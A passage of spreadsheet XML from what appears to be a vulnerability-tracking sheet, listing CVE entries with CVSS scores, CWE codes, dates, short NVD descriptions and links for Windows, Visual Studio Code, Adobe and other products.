      <c r="H309" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81822</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="S310"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T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69846</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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1" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69906</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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2" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72958</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72961</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72962</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76191</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr">
        <is>
          <t>adobe:animate, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S316"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T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76191</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76202</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S317"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T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76202</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77097</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77968</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77968</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81354</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K320" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t>
        </is>
      </c>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81356</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81357</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81378</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81379</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83939</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86600</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>412d305a-227d-44f9-a262-a31ba44f2aea</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
